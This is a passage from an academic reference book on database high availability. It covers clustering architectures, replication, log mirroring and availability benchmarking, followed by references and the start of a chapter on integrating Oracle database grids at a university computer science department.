Database Clustering With database clustering, each physical server in the cluster is called a node. The entire group of nodes work together to form a cluster. These clustering nodes can be viewed as a single node/ server. The showcasing of a single server instead of multiple clustered nodes is accomplished by sharing common resources. These resources can be disk storage, Internet Protocol )IP( addresses, and application instances. All of the nodes in a cluster are in a state of constant communication. If one of the nodes in a cluster becomes unavailable, another node will automatically assume its duties and begin providing users with the same services as the failed node. Typically, each node will have active resources simultaneously. In such cases, synchronization among database content and transactions is an important aspect. This is accomplished by means of the database replication feature. In the event that one of the nodes is failing, the other node will immediately take over active ownership of all the resources from the other node. This process is called failover. Each node in a cluster needs to keep other nodes in that cluster informed of its health and configuration. This is done periodically by broadcasting a network message, called a heartbeat, across a network. The heartbeat signal is usually sent over a private network (e.g., the cluster interconnect), which is used for inter-node communications (Chandrasekaran & Kehoe, 2003). The failover process for a database cluster should require a short interval of a few seconds to complete, depending on the hardware employed. In addition, the database on the failover node must be recovered to maintain transactional consistency. The length of this recovery period depends largely on the level of database activity that was occurring at the time of failover and the type of hardware used. Clients connected to the failed node are disconnected. When they attempt to reconnect, they are able to access the cluster
1916
resources on the backup node. Different database clustering solutions might offer the following advantages: •
•
•
•
Automatic failover: When a failure is detected, the cluster automatically switches from the primary node to the secondary node. Transparent to clients: After the failover is complete, clients can reconnect to the cluster using the same virtual name and/or IP address. Transactional integrity: All committed transactions are saved and made available after the failover process completes. Rapid failover: The failover process for the system can be completed in a few seconds. The subsequent database availability depends on the number of transactions that need to be rolled forward or rolled back.
Recently, most commercial database management system providers have started to address cluster architectures using numerous approaches. While other providers use solutions offered by third-party companies with limited support for scalability and high availability (Cecchet, Marguerite, & Zwaenepoel, 2004). Database clusters are designed to support additional nodes, with two primary architectures (Tendulkar, 2005). These are the Shared Storage (usually called Shared-Disk) and the Shared None (usually called Shared-Nothing). Although, there have been many papers written on the features obtained by these two database architectures, it still seems to be confusing. It is important to understand both the concepts and the different acquired features by implementing each approach, especially in the database high availability area of deployment. The following paragraphs illustrate the main issues regarding shared-disk and federated databases as a step towards shared-nothing database clusters.
Database High Availability
Figure 1. Basic database clustering structure
Public Network
Heartbeat Connection Network Switch
Cluster Node 1
Cluster Node 2
Cluster Node 3
Private Network
Shared Storage System
Shared Storage Media
•
Shared-disk cluster database architecture: The shared storage type of architecture stores the entire database on storage disks that can be directly accessed by each node. This model has typically been the best for scaling the database to handle a large number of concurrent clients, especially in an Online Transaction Processing (OLTP) environment. Transactions running on any instance can directly read or modify any part of the database. Such systems require the use of internode communication to synchronize update activities performed from multiple nodes. When two or more nodes contend for the same data block, traditional shared disk database systems use disk I/O for synchronizing data access across multiple
Shared Storage Media
nodes (i.e., the node that has a lock on the data writes the block to the disk before the other nodes can access the same data block) (Chandrasekaran & Kehoe, 2003). A node can be made up of multiple processors. A common type of node is a Symmetric Multi-Processor (SMP) node. Each node has its own dedicated system memory as well as its own operating system and database instance. Shared disk database architectures run on the top of hardware clusters that give every participating server equal access to all disks. However, servers do not share memory; clustered database combines the memory in the individual nodes to provide a single view of the distributed cache memory for the entire database system (Cai & Leung, 2002).
1917
Database High Availability
Figure 1 demonstrates the basic structure of the database clusters. The primary cluster components are the processor nodes, a cluster interconnect, and a shared storage subsystem. The nodes share access to the storage subsystem and resources that manage data, but they do not physically share main memory in their respective nodes. Clustered databases have a single data dictionary and a single system image. Each cluster node requires the following hardware: •
•
A hard disk for the server’s operating system: This disk is not shared and is not connected to the controller that is used to connect to the shared storage. Instead, the disk uses its own controller and should be mirrored for improved availability. High speed connection adapters (i.e., Network Interface Card (NIC)) that connect to the cluster’s shared disk storage: One NIC is used to connect the cluster node to the external network. The second NIC is used for the private cluster network, which maintains the heartbeat of the cluster (a signal indicating that a node is available).
Because the nodes in a cluster use a shared storage subsystem, they typically need to be in relatively close proximity to one another. The distance between nodes depends on the connection that the nodes use for the storage subsystem. Geo-clusters (multi-site clusters) are formed by separating the cluster nodes geographically. Such structure is accomplished by synchronously mirroring the quorum disk between the different locations. Generally a cluster is essentially unaware of the geographic distance between its nodes, so these solutions must be implemented at the network and storage levels of the organization’s infrastructure. •
1918
A database instance that runs on every node of the cluster: Transactions running
on any instance can read or update any part of the database. There is no notion of data ownership by a node. System performance is based on the database effectively utilizing a fast interconnect between cluster nodes. With the concept of using an N+1 configuration (N active nodes with 1 spare node), it provides a very flexible and cost effective clustering scenario to enable highly available applications. As an instance, with a four-node cluster in an N+1 configuration, you can have three of the four nodes set up to actively provide different services while the fourth node is a passive node that is ready to assume the services of any of the three active nodes in the event of a server failure. Clustering is powerful, but not all database clustering is the same. There are as many implementations as there are databases. The costs of these vary significantly, and many vendors leave too many of the practical issues of clustering up to the application programmers, which significantly impacts the cost and complexity of the solution (Choosing the Right Database, 2004). Even among databases that provide clustering, many of the challenges of clustering are not addressed in the design of the database. Instead, the expectation is that application designers will do the necessary programming to make it to work. Primary key generation, for instance, can be a serious problem in clustered databases. If the connection between clustered databases goes down and they are forced to operate independently, the databases may generate the same primary key and use it to insert a different record at each location. If this happens, the cluster will completely fail when the link comes back up and the keys conflict. Another often-overlooked issue is auto-failover, or the ability for clients to automatically connect to a second database server when the primary server goes down. The problem is that with most databases, this is not automatic. Therefore, application programmers need to build their application with clustering in mind.
Shared-nothing (federated database) cluster database architecture: The shared nothing (federated database) architecture is a logical unification of distinct databases running on independent servers, sharing no resources, and connected by a local area network (LAN). Thus, a federated database is a distributed database (Buch & Cheevers, 2002). The concept is known as database replication and is used to maintain the same copy of database content across each node in the cluster. Replication helps the slave node in maintaining a duplicate copy of the data from the master node of that cluster.
Database files are partitioned among the instances running on the nodes of a multi-computer system. Each instance or node has ownership of a distinct subset of the data, and all access to this data is performed exclusively by this owning instance. In other words, a shared nothing system
uses a partitioned or restricted access scheme to divide the work among multiple processing nodes. A transaction executing on a given node must send messages to other nodes that own the data being accessed. It must also coordinate the work done on the other nodes to perform the required read/ write activities. Such messaging is commonly known as function shipping. However, shared nothing databases are fundamentally different from distributed databases in that they operate one physical database using one data dictionary (Chandrasekaran & Kehoe, 2003). For both the DBA as well as the application developer, there is a clear distinction between local data, which is on the disk attached to a particular server, and the remote data, which is owned by another server in the federated database. Applications see a logical single view of the data through UNION ALL views and distributed SQL (Microsoft calls this technology Distributed Partitioned Views DPVs) (Otey & Otey, 2005).
1919
Database High Availability
The DPV is constructed differently at each node. It must explicitly consider which partitions are local and which are remote. Figure 2 shows the overall structure of the shared nothing database clusters architecture.
Shared Disk vs. Shared-Nothing Storage This section will try to demonstrate the main variations in implementation aspect between the shared and shared nothing storage approaches. The discussion will focus on application development and database high availability concerns. •
Application development: Generally, database clusters appear just like a regular database, which means there are no additional constraints on the application developer. An application, even a complex OLTP for a Symmetric Multiprocessing (SMP) platform, runs with no modification on a shared-disk cluster. The single database image, with no data partitioning, carries over from the SMP to the cluster.
In contrast, federated databases do not have a single database image, which means they are multiple independent databases. Data must either be distributed across participating databases (for large, frequently updated transaction tables) or replicated (for reference data tables that can be accessed equally from every node). Dividing data entities across databases requires creating distributed partition views, which are distinct on every node. •
1920
High availability: Before going into details of the availability framework for cluster systems, it seems valuable to understand the differences between availability within a single node and within a cluster. In a single node, database system availability refers to the ability to survive various application
and operation failures within the database instance. In the worst case of the failure of the node, availability refers to the ability to recover the database to a transaction consistent state as fast as possible. For a cluster system, aside from handling failure scenarios in a single node, it needs to handle failure scenarios associated with a node, a group of nodes, or a network, while providing required performance. A cluster database builds on top of the fault-tolerant capabilities of the single instance database and enhances the database server to handle failure scenarios unique to a cluster system. Another main advantage of the cluster architecture is the inherent fault tolerance provided by multiple nodes. Since the physical nodes run independently, the failure of one or more nodes will not affect other nodes in the cluster. In the extreme case, a cluster system can still be available even when all but one node survives, making a system based on cluster highly available. This architecture also allows a group of nodes to be taken off-line for maintenance while the rest of the cluster continues to provide services online. When a node in a shared-disk cluster fails, all data remains accessible to the other nodes. In-flight transactions spanning nodes are rolled back. Thus, no data remains locked as a result of the failure. In most offered database clusters with shared-disk, recovery after node failure is automatic. After detecting node failure, the cluster is automatically reconfigured and the same rollforward/roll-back recovery processes that work in the SMP environment are applied. Another benefit of the shared disk approach is that it provides unmatched levels of fault tolerance with all data remaining accessible even if there is only one surviving node. If a node in the shared disk cluster fails, the system dynamically redistributes the workload among all the surviving cluster nodes. This ensures uninterrupted service and balanced cluster-wide resource utilization.
Database High Availability
On the other hand, data in federated databases is divided across databases, and each database is owned by a different node. The only way to access data owned by a node is to request the data from the node, and have the node service the request. Thus, when the node fails, the data that it owns becomes unavailable, and the entire system becomes unavailable as well. Also, any in-flight distributed transactions controlled by that node might have locked data on other nodes. Therefore, recovering from node failures requires additional work in resolving these in-flight transactions. As instances of a recently-provided database clustering commercial solutions, Oracle Real Application Clusters have started to address cluster architectures using shared storage systems such as SAN (Storage Area Network). Sybase offered Adaptive Server Enterprise with efficient autofailover capability. The IBM DB2 Integrated Cluster Environment also uses a shared storage network to achieve both fault tolerance and performance scalability. Open-source solutions for database clustering have been database-specific. MySQL replication uses a master-slave mechanism as a solution offered by a third-party company with limited support for transactions and scalability (Cecchet et al., 2004). Postgre does not have a database clustering option, although some experi-
ments have been reported using partial replication. These extensions to existing database engines often require applications to use additional APIs to benefit from the clustering features.
Database Replication In many Internet applications, a large number of users that are geographically dispersed may routinely query and update the same database. In this environment, the location of the data can have a significant impact on the application response time and availability. A centralized approach manages only one copy of the database. This approach is simple, since contradicting views between replicas are not possible. The centralized approach suffers from two major drawbacks (Amir, Danilov, & Miskin-Amir, 2002): •
•
Performance problems due to high server load or high communication latency for remote clients Availability problems caused by server downtime or lack of connectivity; clients in portions of the network that are temporarily disconnected from the server cannot be serviced
Figure 3. Database replication overall structure
Secondary Database Server
Primary Database Server
Secondary Database Server
W E N N A TR TI C SA
a iti In
N O
ro ch yn lS
S
n ti o za ni
Replicator
N :S A H PS T O
1921
Database High Availability
•
The server load and server failure problems can be addressed by replicating the database servers to form a cluster of peer servers that coordinate updates. If the primary server fails, applications can switch to the replicated copy of the data and continue operations. Database replication is different from file replication, which essentially copies files. Database-replication products log selected database transactions to a set of internal replication-management tables. The software then periodically checks these tables for updated data and moves the data from the source to the target systems while guaranteeing data coherency and consistency. Many database-replication products even have built-in tools to allow updating the primary database with any changes that users made to the backup database while the primary database was offline. Figure 3 shows the main components of the database replication environment. The database replication process is usually done by three primary components: •
•
Secondary database server (Subscriber): The destination of the replicated data; there can be one of more Subscribers; and Replicator: This handles sending the data from the Publisher to the Subscriber(s).
Database replication uses a snapshot of the source database to initially synchronize the databases at the publisher and the subscriber. As transactions are committed at the publisher side, they are captured and sent to the subscriber(s). Transactional replication mainly is not designed for high availability; the process of promoting the secondary server to assume the role of the primary server is manual, not automatic. In addition, returning the primary server to its original role after a failure requires a complete database restoration.
Database Log Mirroring The database mirroring is another option that enables database-level failover against unplanned downtime caused by server or database failures.
Primary database server (Publisher): The source of the data being replicated;
In the event that the primary database fails, database mirroring enables a second standby database server to be almost instantly available with zero data loss. The secondary database will always be updated with the current transaction that is being processed on the primary database server. The impact of running Database Mirroring to transaction throughput is minimal. Unlike clustering services which works at the server level, database mirroring is implemented at the database level. Database mirroring provides nearly instant failover time, taking only a few seconds, while clustering typically has longer failover times. Database Mirroring provides added protection against disk failures as there is no shared quorum disk as there is in a clustering solution. Unlike clustering, which requires specific hardware configurations, database mirroring works with all standard hardware that support most of today’s DBMS systems. Figure 4 demonstrates the overview of how database mirroring works. Database mirroring is implemented using three systems: the primary server, the secondary server, and the observer. The primary database server usually provides the database services. By default, all incoming client connections are directed to the primary server. The job of the secondary server is to maintain a copy of the primary server’s mirrored database. The secondary server is not restricted to just providing backup services. Other databases on the secondary server can be actively supporting other unrelated applications. The observer essentially acts as an independent third party with the responsibility of determining which system will assume the role of the primary server. The applied strategy in database mirroring is usually done by sending transaction logs between the primary and secondary servers. Such practice leads to database mirroring of a real-time log shipping application. When a client system writes a transaction to the primary server, that request is written to the primary server’s log file before it is
written into the data file. That transaction record then gets sent to the secondary server where it gets written to the secondary server’s transaction log. After the secondary server has written the record to its log, it sends an acknowledgement to the primary server. This lets both systems to know that the record has been received and that the same data now exists in each server’s log file. In the case of a commit operation, the primary server waits until it receives an acknowledgement from the mirroring server before it sends its response back to the client saying that the operation is completed. The secondary server should be in a state of continuous recovery to keep the data files up-to-date with the incoming transaction log data. To facilitate high availability for client applications, database mirroring works in conjunction with the Transparent Client Redirection (TCR) layer, which in turn enables end-user systems to be automatically redirected to the secondary server in the event that the database on the primary server becomes unavailable.
AVAILABILITY BENCHMARKING METHODOLOGY In this section, a sample of ad-hoc measurement of availability in database management systems is illustrated by Brown who worked on the software Redundant Array of Independent Disks (RAID) availability benchmarking (Brown, 2000; Brown & Patterson, 2000). Brown’s technique quantifies availability behavior by examining the variations in delivered quality of service as the system is subjected to targeted fault injection. The availability benchmarking methodology consists of four parts: (i) a set of quality service metrics that measure the test system’s behavior; (ii) a generator that produces a realistic workload and provides a way to measure the quality of service under that workload; (iii) a fault-injection environment used to compromise
1923
Database High Availability
the test system’s availability; and (iv) a reporting methodology based on a graphical representation of the test system’s availability behavior. The first step in the availability benchmarking methodology is to select appropriate quality of service metrics. These metrics must be chosen so that they can reflect degradations in system availability, in the broadest sense of the term. The choice depends on properties of the system being benchmarked. For example, performance degradation would be seen as a decrease in availability in most systems. Thus, a performance-based quality of service metric is typically an appropriate choice for an availability benchmark. But other metrics can be considered as well, including, for example, the consistency or accuracy of results delivered by the test system. The second component of the availabilitybenchmarking methodology, the workload generator, typically takes the form of a traditional performance benchmark. The role of this component is to produce a realistic workload that places the test system under the kind of load conditions that it typically experiences in practice. Using a performance benchmark since a great deal of existing work has been carried out to construct realistic workloads in that context. In addition, it requires that the workload generator be able to measure the desired quality of service metrics defined in the first step of the methodology. Since quality of service is typically closely tied to performance, a standard performance benchmark often has the desired measurement capability built-in. The availability benchmarking methodology specifies that, while the workload generator is running, the test system should be subjected to targeted faults designed to mimic real-world failure cases that may compromise availability. The third component of the methodology is a fault-injection environment. A key point here is that the injected faults must be chosen to be realistic, either based on a priori knowledge of failure-prone design flaws of some part of the system, or based on historical knowledge of typi-
1924
cal failure cases for the system and the kinds of faults that provoke these cases. Finally, the last component of the availabilitybenchmarking methodology specifies the way that results are collected and presented. Essentially, this component defines the procedural aspects of carrying out an availability benchmark. First, the system is run under the generated workload with no faults injected. The quality of service values collected during this run are statistically processed to produce a 99% confidence interval demarcating the normal quality of service behavior of the system. Then, the experiments are repeated multiple times with different combinations of faults injected during those runs; the methodology specifies both single-fault micro benchmarks in which a single fault is injected and the system is left untouched until it stabilizes or crashes, and multiple-fault macro benchmarks in which a series of faults designed to mimic a complex real-world scenario is injected, with human intervention allowed for system maintenance purposes. The results of these faulty runs are reported graphically, with quality of service plotted versus time, overlaid with both an indication of when the faults were injected as well as with the 99% confidence interval computed from the normal run.
CONCLUSION High availability does not just happen. It is only achieved through strengthening the combination of people, processes, and technology. A plan that focuses purely on technology will never achieve high levels of availability because many of the significant factors that affect availability stem from the interaction of people and processes. Preparing the proper hardware and software platform is only a starting point. From that point on, high availability is the result of good planning and practices in combination with the appropriate technologies.
Database High Availability
Designing a cost-effective high-availability environment for an information system(s) requires understanding the causes of outages, the critical elements for application execution, and the impacts of application outages on the business. With today’s technology, there is a range of solutions to support business-critical applications. Although outages may occur, recovery is likely to be quick. If an application outage lasts for more than a few minutes, it will severely impact business. In such cases, a clustering solution may be necessary. For constant 24-hour availability, or applications where outages either are life-threatening or will directly affect the survival of the business, it will be required to have high-end and fault-tolerant solutions. Good operational procedures can make an enormous difference between theoretical availability and the actual availability of a solution. Finally, an organization must have an enterprise vision for high availability to gain and sustain its competitive advantage. A strategy must be developed to effectively respond to unanticipated events or disruptions. Demands, risks, and opportunities abound, ranging from market fluctuations to employee error and misconduct to earthquakes and terrorism.
Barraza, O. (2002). Achieving 99.9998+% storage uptime and availability. Carlsbad, CA: Dot Hill Systems Corp.
REFERENCES
Cai, J., & Leung, S. (2002). Building highly available database servers using Oracle real application clusters. Redwood Shores, CA: Oracle Corporation
A framework for system high availability. (2000). CA: Intel Corporation, Inc. Amir, Y., Danilov, C., & Miskin-Amir, M. (2002). Practical wide-area database replication (Tech. Rep. No. CNDS-2002-1). Baltimore: Johns Hopkins University. Aronoff, E. (2003). Building a 24x7 database. Saint Johns, MI: Quest Software, Inc. Arora, R. (2005). High availability strategies of an enterprise. Uttar Pradesh, India: TATA Consultancy Services.
Bauer, M. (2001). Oracle8i Parallel Server Concepts Release 2. Redwood City, CA: Oracle Corporation, A76968-01. Bender, W. J., & Joshi, A. (2004). High availability technical primer. McLean, VA: Project Performance Corporation. Brien, M. O. (2000). GoAhead Availability Management Service Technical Brief. Bellevue, WA: GoAhead Software, Inc. Brown, A. (2000). Availability benchmarking of a database system. Berkeley, CA: University of California at Berkeley, EECS Computer Science Division. Brown, A., & Patterson, D. A. (2000). Towards availability benchmarks: A case study of software RAID systems. In Proceedings of the 2000 USENIX Annual Technical Conference (pp. 263-276). San Diego, CA. Buch, V., & Cheevers, S. (2002). Database architecture: Federated vs. clustered. Redwood Shores, CA: Oracle Corporation
Cecchet, E., Marguerite, J., & Zwaenepoel, W. (2004). C-JDBC: Flexible database clustering middleware. In Proceedings of USENIX Annual Technical Conference, Freenix Track, Boston (pp. 9-18 ). Chandrasekaran, S., & Kehoe, B. (2003). Technical comparison of Oracle real application clusters vs. IBM DB2 UDB ESE. Redwood Shores, CA: Oracle Corporation
1925
Database High Availability
Choosing the right database: The case for OpenBase SQL. (2004). Concord, NH: OpenBase International, Ltd.
Lumpkin, G. (2004). Oracle partitioning—a must for data warehouse and OLTP environments. Redwood Shores, CA: Oracle Corporation, Inc.
DB2operation: The challenge to provide 24x365 availability. (2000). Houston, TX: BMC Software, Inc.
Otey, M., & Otey, D. (2005). Choosing a database for high availability:An analysis of SQL server and Oracle. USA: Microsoft Corporation.
Disaster recovery package for SYBASE adaptive server enterprise. (2004). Dublin, CA: Sybase Inc.
Parikh, A. (2004). Trustworthy software. Unpublished master of science dissertation, Stevens Institute of Technology, Castle Point on Hudson, Hoboken.
Gribble, S. D., Brewer, E. A., Hellerstein, J. M., & Culler, D. (2000). Scalable, distributed data structures for Internet service construction. In Proceedings of the 4th Symposium on Operating Systems Design and Implementation (OSDI 2000), San Diego, CA (pp. 319-332). High Availability and More: Achieving a Service Availability™ Solution. (2001). Bellevue, WA: GoAhead Software, Inc. High availability white paper. (2001). San Jose, CA: BlueArc Corporation. Klein, D. (1988). Architecting and deploying highavailability solutions. USA: Compaq Computer Corporation, Inc. Kumar, S. (2005). Oracle Database 10g Release 2 High Availability. Redwood City, CA: Oracle Corporation, Inc. Lemme, S. (2002). IT managers guide: Maximizing your technology investments in Oracle. Database Trend and Application Magazine. Lemme, S., & Colby, J. R. (2001). Implementing and managing Oracle databases (1st ed.). New York: PRIMA Publishing. Low cost high availability clustering for the enterprise. (2004). Burlington, MA: Winchester Systems Inc. and Red Hat Inc.
1926
Providing Open Architecture High Availability Solutions. (2001). Bellevue, WA: GoAhead Software, Inc. Rosenkrantz, B., & Hill, C. (1999). Highly available embedded computer platforms become reality. Chicago, USA: Motorola Computer Group, issue of Embedded Systems Development. Russom, P. (2001). Strategies and Sybase Solutions for Database Availability. Waltham, MA: Hurwitz Group Inc. Saito, Y., Bershad, B. N., & Levy, H. M. (2000). Manageability, availability, and performance in Porcupine: A highly scalable, cluster-based mail service. In Proceedings of the 17th Symposium on Operating System Principles (SOSP): ACM Transactions on Computer Systems, August, 2000, Vol. 18(3), (pp. 298-332). Kiawah Island, SC. Sauers, B. (1996). Understanding high availability. USA: Hewlett-Packard Company, Inc. Service availability: A customer-centric approach to availability. (2000). Bellevue, WA: GoAhead Software, Inc. Singh, H. (2001). Distributed fault-tolerant/high availability systems. Los Angeles, CA: TRILLIUM Digital System, Inc.
Database High Availability
Standards for a Service Availability™ Solution. (2002). USA: Demac Associates for Service Availability™ Forum.
Tendulkar, V. S. (2005). MySQL Database Replication and Failover Clustering. Mumbai, India: Tata Consultancy Services Ltd.
This work was previously published in An Overview of Knowledge Management, edited by M. Radaideh; H. Al-Ameed, pp. 1-33, copyright 2007 by IGI Publishing (an imprint of IGI Global).
1927
1928
Chapter 6.3
Database Integration in the Grid Infrastructure Emmanuel Udoh Indiana University – Purdue University, USA
INTRODUCTION The capability of the Web to link information over the Internet has popularized computer science to the public. But it is the grid that will enable the public to exploit data storage and computer power over the Internet analogous to the electric power utility (a ubiquitous commodity). The grid is considered the fifth generation computing architecture after client-server and multitier (Kusnetzky & Olofson, 2004) that integrates resources (computers, networks, data archives, instruments, etc.) in an interoperable virtual environment (Berman, Fox, & Hey, 2003). In this vein, grid computing is a new IT infrastructure that allows modular hardware and software to be deployed collectively to solve a problem or rejoined on demand to meet changing needs of a user. Grid computing is becoming popular in the enterprise world after its origin in the academic and research communities (e.g., SETI@home), where it was successfully used to share resources, store data in petabytes/exabytes, and ultimately lower costs. There are several reasons for the
embrace of the enterprise grids. In the nineties, the IT world was confronted with the high cost of maintaining smaller, cheaper and dedicated servers such as UNIX and Windows. According to Oracle (2005), there was the problem of application silos that lead to underutilized hardware resources; monolithic and unwieldy systems that are expensive to maintain and change; and fragmented and disintegrated information that cannot be fully exploited by the enterprise as a whole. Various surveys put the average utilization of servers in a typical enterprise to often much less than 20% (Goyal & Lawande, 2006; Murch, 2004). But with the increasingly available cheaper, faster and affordable hardware such as server blades, and operating systems like the open source Linux, the IT world embraced grid computing to save money on hardware and software. With the growing importance of grid computing, it is easy to conjecture why many new terms have been coined for it. In the literature and industry, other terms used interchangeably for grid computing are utility computing, computing on demand, N1, hosted computing, adaptive computing, organic
computing and ubiquitous computing (Goyal & Lawande, 2006; Murch, 2004; Oracle, 2005 ). The grid is an all-encompassing, 21st century computing infrastructure (Foster, 2003; Joseph & Fellenstein, 2004) that integrates several areas of computer science and engineering. A database is an important component of the application stack in the industry and is increasingly being embedded in the grid infrastructure. This article focuses on integration of database grids or grid-accessible databases in the industry using Oracle products as examples. Vendors like Oracle and IBM are providing grid-enabled databases that are supposed to make enterprise systems unbreakable and highly available. Oracle has been in the forefront in this endeavor with its database products. In recognition of the significant new capabilities required to power grid computing, Oracle has named its new technology products Oracle 10g (g for grid). Oracle provides seamless availability through its database products with such features like streams, transportable table-spaces, data hubs, ultra-search and real application clusters. Although companies will not like to distribute resources randomly on the Internet, they will embrace enterprise database grids, as they embraced Internet in the form of Intranets. To the business world, database grids will help achieve high hardware utilization and resource sharing, high availability, flexibility, incrementally scalable low cost components and reduced administrative overhead (Kumar & Burleson, 2005; Kusnetzky & Olofson, 2004).
BACKGROUND The grid technology is still evolving, and databases are increasingly being incorporated into its infrastructure. IBM has contributed immensely in this endeavor with its autonomic and grid computing projects, but Oracle is the clear-cut industry leader in enterprise database grids. Oracle, a member of the enterprise grid alliance (EGA) that promotes tools and standards for enterprise computing, has
been preparing and targeting the grid market since the Oracle9i release with products like Oracle real application clusters (now morphed to automatic storage management system). This article will therefore discuss enterprise grid computing in terms of the features available in Oracle 10g database products. The main features that clearly differentiate grid computing from other forms of computing architectures, such as client server or multitier, are virtualization and provisioning. Virtualization creates a logical view or abstraction that allows the pooling together of resources (e.g., data, computing power, storage capacity, and other resources) for consumption by other applications, while provisioning determines how to meet on demand the specific needs of consumers. As consumers request resources through the virtualization layer (which breaks the hard-coded connection between providers and consumers (Oracle, 2005), provisioning guarantees resources are allocated for the request. To achieve these objectives, a grid implements a layered architecture as depicted in Figure 1a. In a semblance of the generalized grid architecture, the Oracle grid builds a stack of its software in a virtual environment, as shown in Figure 1b. The bottom layer hosts the storage units such as a storage area network (SAN), while the next horizontal layer contains the infrastructure such as the hardware and software that create a data storage and program execution environment (infrastructure grid). The next layer, the application server, contains the program logic and flow that define specific business processes (application grid). The topmost layer (information grid) hosts applications such as user applications, enterprise resource planning and portal software that can be accessed over the network without the application being architected to support the device or network. This virtualized environment has a unified management structure as well as an infrastructure for security.
1929
Database Integration in the Grid Infrastructure
As depicted in Figure 1b, Oracle 10g software stack, which is configured to self-manage, acts as a single computing resource to the user even in a geographically distributed environment. This allows organizations to protect and optimize their investment in hardware and software and also access newer system features in a more reliable, powerful and scalable environment. To keep this unified structure manageable and also eliminate the application silo model, Oracle enterprise manager has a grid control that monitors, provisions, clones and automates even in heterogeneous environments (Khilani, 2005).
MAIN FOCUS The evolving enterprise database grid brings substantial benefits to the industry but poses a major challenge in integration and adoption. With yearly global business volume in excess of $10 billion dollars, databases are critical components in the enterprise application stack. The existing database infrastructure in companies are aggregates of many years of investments in a wide range of interfaces and tools for performance and security. Noting all the hype about grids, it is natural that its adoption will be resisted by employees, who are unwilling to change existing processes and technology. Researchers believe that building grid-enabled database infrastructures from
scratch is both unrealistic and a waste of effort and resources (Watson, 2003). Instead, existing database management systems should be integrated into the grid in an incremental manner, absorbing the existing investments without being disruptive. Oracle’s grid-enabled database takes cognizance of this reality, and hence this article focuses on database grid integration and adoption vis-a-vis Oracle grid products. At the department of computer science (CS), Indiana University–Purdue University, Fort Wayne, an Oracle database grid was introduced to aid the administration of the database program (for research and education). Experience from this program supports these transitioning steps for the integration and adoption of an enterprise database grid: identification, standardization, consolidation and automation.
Identification Organizations have different IT infrastructures that may influence decisions to integrate their enterprises in database grids. An approach is to identify a suitable activity or sweet spot that will facilitate the adoption of the grid, not necessarily in a big swoop but small scaled and incremental. Goyal and Lawande (2006) give some characteristics of a sweet spot, such as a task with a compelling use case that has broader acceptance in a company or a task with measurable goals and
Figure 1. Structure of generalized grid and Oracle database grid Virtual Grid Applications
Applications (SCM, ERP)
Virtual Specific Grid Middleware and Tools
Application Servers
Virtual Infrastructure layer
Database Servers
Virtual Global Resources
Storage Disks
(a) Generalized Grid
1930
M anagem ent S e c u rity V irtu a liza tio n
(b) Oracle Database Grid
Database Integration in the Grid Infrastructure
Figure 2. Oracle grid control at the CS department, Fort Wayne
benefits on a small scale that could be executed within a realistic time frame. For instance, organizations may have periodic acquisition plans for software and hardware, a problem monitoring IT infrastructure, resource allocation or desire for improvement of business flows. In such situations, enterprises can acquire new, low cost modular servers during the cycle of hardware acquisition for database and application servers, deploy grid control as a solution for management constraints, or apply provisioning technologies such as transportable tablespaces and streams for resource allocation problems. At the CS department, Fort Wayne, we were confronted with the problem of managing our
Oracle servers (database, application server, storage and instrument) due to the absence of a DBA. This was a sweet spot that caused us to introduce Oracle database grid products. Oracle database grid control (ODGC–Figure 2) solved this management constraint based on the philosophy of managing many as one (Khilani, 2005; Kumar & Burleson, 2005). ODGC adopts a holistic management view to monitor diverse Oracle products, and also provision, clone and automate jobs, even providing with alerts and warnings in heterogeneous environments. Its self-monitoring features ensure that critical components of grid control are always available and functional (Khilani, 2005; Kumar & Burleson, 2005). ODGC is
1931
Database Integration in the Grid Infrastructure
bundled with a management grid control console (client), a management service (middleware) and a management agent (backend) in a three-tiered architecture. It can monitor any node (target) with a management agent that collects host and database-related statistics. To add a new system to the management target list involves simply installing the management agent on that system. Thus, as an IT department grows, more servers can be easily added for load balancing. In addition to the centralized management structure, the grid control provides a unified security/identity management interface based on the single sign-on technique, which allows a user to log on once to a network and then access multiple applications with a single password.
Standardization As an attempt to achieve high productivity, organizations normally invest in the best of available technologies and processes, regardless of interoperability of the systems. This practice has caused the IT world to make huge financial outlay for interoperability (Chrabakh & Wolski, 2006). The grid approach supports using interoperable products as a way to curb variability and complexity prevalent in current data centers. According to Goyal and Lawande (2006), one way to achieve technology standardization is to limit the number of vendors and products that support industry standards for interoperability. This approach reduces the amount of resources for deployment and testing of single product lines and paves the way for easier future consolidation. While technology standardization focuses on reduction of heterogeneous hardware and software (vendors and products), process standardization is geared toward the architecture for development, deployment and management. Process standardization reduces the variability of a system life cycle and associated errors. In this vein, IT process standards such as ITIL could be adopted as a guide. This approach ensures that proven best management
1932
practice is observed in the life cycle of systems, thus streamlining activities and reducing cost. To achieve standardization of the hardware and software at the CS department, Fort Wayne, the Oracle grid products are only operated on Linux servers (much cheaper than symmetric multiprocessor–SMP) and Linux operating systems (Red Hat). This ensures uniform maintenance of the hardware and software resources, thereby easing administration.
Consolidation In consolidating technology and IT processes, organizations need to initiate a long term strategy to strengthen all aspects of grid-enabling IT infrastructure, by reducing fragmented data centers. A few data centers eases management in one place and encourages economy of scale. Consolidation supports the methodology of grid computing at every step of system development, deployment and management, for example, consolidating storage with integrated structure like a storage area network (SAN) improves performance. Furthermore, modular servers can be used to consolidate databases and application servers. According to Goyal and Lawande (2006), integration may be physical by moving data to one database or logical by using products like data hubs. This substantially reduces power, cooling, space requirements and management costs. Consolidation maximizes the gains of standardization. Currently, CS department at Fort Wayne is implementing a storage area network that will provide a storage subsystems to multiple hosts at the same time.
Automation Automation of tasks and processes reduces human errors and lowers costs in an enterprise. After standardization and consolidation, automation is easier to implement. For instance, standardized operating systems and storage layouts can be automated, as scripts and automation tools can
Database Integration in the Grid Infrastructure
be easily deployed. However, best management practice favors automating simple, repetitive and laborious tasks at the onset. Such tasks can be identified beginning from initial deployments to maintenance of systems. At the CS department, Fort Wayne, patches, alerts, testing, deployment of servers and maintenance can be scheduled for automation with the Oracle grid control. A valuable automation is that of patching, which allows downloads from the Oracle’s Metalink Web site. This feature helps keep the systems in sync and more secured.
